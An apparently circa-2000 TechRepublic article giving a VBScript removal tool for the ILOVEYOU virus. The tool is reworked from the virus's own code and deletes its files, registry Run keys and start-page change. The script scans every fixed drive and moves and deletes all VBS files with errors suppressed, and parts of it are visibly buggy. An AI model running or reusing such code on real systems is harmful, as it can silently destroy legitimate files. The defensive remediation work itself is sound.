Lock IT Down: A quick quarantine for ILOVEYOU e-mail virus

If you’re unable to get a vendor-distributed virus image to fight off the ILOVEYOU virus, here’s a quick quarantine measure that may help you contain this particularly nasty threat. Developed on the fly by TechRepublic’s own Kevin Brown, we used this tool (gratefully dubbed IHATEYOU) ourselves today to contain the spread of ILOVEYOU.

Of course, do not use this simple solution as substitute for the vendor-distributed fixes beginning to circulate. We used it, and it worked for us, but we do not guarantee that it will work in your shop. We hope it can help you get through a crazy day, though.

In short, Kevin reversed the hacker’s VB code to identify instances of VBS files created by the virus, rename them with a IHY (IHATEYOU) extension, and then move them to the C:/Temp directory. His script also undoes the three Registry changes made by ILOVEYOU and resets the infected machine’s IE home page to blank, away from the Trojan horse page installed by ILOVEYOU.

Before you run the script, you probably want to check to see if a machine is infected by searching for these files:

MSKernel32.vbs
Win32DLL.vbs
LOVE-LETTER-FOR-YOU.TXT
WinFAT32.EXE
WIN-BUGSFIX.EXE
script.ini

You can run IHATEYOU on a noninfected system with limited impact. Be forewarned that any legitimate VBS files installed on the system will be renamed as IHY and moved to C:/Temp. In addition, the script conflicts with the IRC instant messaging and chat service.

To use IHATEYOU, copy the following text into a text editor and save the file with a .vbs extention or click on the IHATEYOU sidebar on the right-hand navigation bar.

IHATEYOU
rem I Hate You – removes I love you virus
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=””
ctr=0
Set fso = CreateObject(“Scripting.FileSystemObject”)
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=”Undo LOVE LETTER VIRUS”
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(“WScript.Shell”)
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)

fso.DeleteFile dirsystem & “\MSKernel32.vbs”, true
fso.DeleteFile dirwin & “\Win32DLL.vbs”, true
fso.DeleteFile dirsystem & “\LOVE-LETTER-FOR-YOU.TXT.vbs”, true
fso.DeleteFile dirsystem & “\WinFAT32.EXE”, true
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\MSKernel32″
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\RunServices\Win32DLL”
downread=””
downread=regget(“HKEY_CURRENT_USER\Software
\Microsoft\Internet Explorer\Download Directory”)
if (downread=””) then
downread=”c:\”
end if
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\WIN-BUGSFIX”
regdelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Run\WinFAT32″
regcreate “HKEY_CURRENT_USER\Software\Microsoft
\Internet Explorer\Main\Start Page”,”about:blank”
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&”\”)
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext=”vbs”) or (ext=”vbe”) or (s=”script.ini”) then
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(“c:\temp\”&”\”&bname&”.ihy”)
fso.DeleteFile f1.path, true
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regdelete(regkey)
Set regedit = CreateObject(“WScript.Shell”)
regedit.RegDelete regkey
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject(“WScript.Shell”)
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject(“WScript.Shell”)
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject(“WScript.Shell”)
end sub
sub html
On Error Resume Next

fso.DeleteFile(dirsystem&”\LOVE-LETTER-FOR-YOU.HTM”)
end sub

TechRepublic Premium editorial calendar: IT policies, checklists, toolkits and research for download

TechRepublic Premium content helps you solve your toughest IT issues and jump-start your career or next project.

A computer running payroll software. — Image: Nuthawut/Adobe Stock

Tech & Work

The best payroll software for your small business in 2023

Looking for the best payroll software for your small business? Check out our top picks for 2023 and read our in-depth analysis.

Malware, or Hack Attack Concept. — Image: WhataWin/Adobe Stock

Security

Top cybersecurity threats for 2023

Next year, cybercriminals will be as busy as ever. Are IT departments ready?

The Salesforce building in San Francisco. — Image: Sundry Photography/Adobe Stock

Cloud

Salesforce supercharges its tech stack with new integrations for Slack, Tableau

The company, which for several years has been on a buying spree for best-of-breed products, is integrating platforms to generate synergies for speed, insights and collaboration.

remote-hiring-video-woman-interview-recruiting-presenting — fizkes / iStock

Software

The best applicant tracking systems for 2023

Organize a number of different applicants using an ATS to cut down on the amount of unnecessary time spent finding the right candidate.

People near the Microsoft store on Fifth Avenue in New York City. — Image: Bumblee_Dee, iStock/Getty Images

Software

108 Excel tips every user should master

Whether you are a Microsoft Excel beginner or an advanced user, you'll benefit from these step-by-step tutorials.

Shadow IT is a concept whereby an organization’s employees use technology, services or systems without the knowledge of or approval from the IT department. It has arisen due to several reasons: Advances in cloud computing, which involve the usage of applications or sharing of data in public environments previously owned by IT. The evolution of ...

Auditing and logging are essential measures for protecting mission-critical systems and troubleshooting problems. This policy outlines the appropriate auditing and logging procedures for computer systems, networks and devices that store or transport critical data. From the policy: Many computer systems, network devices and other technological hardware used in the enterprise can audit and log various ...

Determining how and when to renew support contracts can be tedious and time-consuming. Our vendor contract renewal planner will help you schedule support renewals and budget the related costs. From the planner: Some companies schedule their support contract renewals to take effect all at once, such as on January 1. This provides a convenient renewal ...

Lock IT Down: A quick quarantine for ILOVEYOU e-mail virus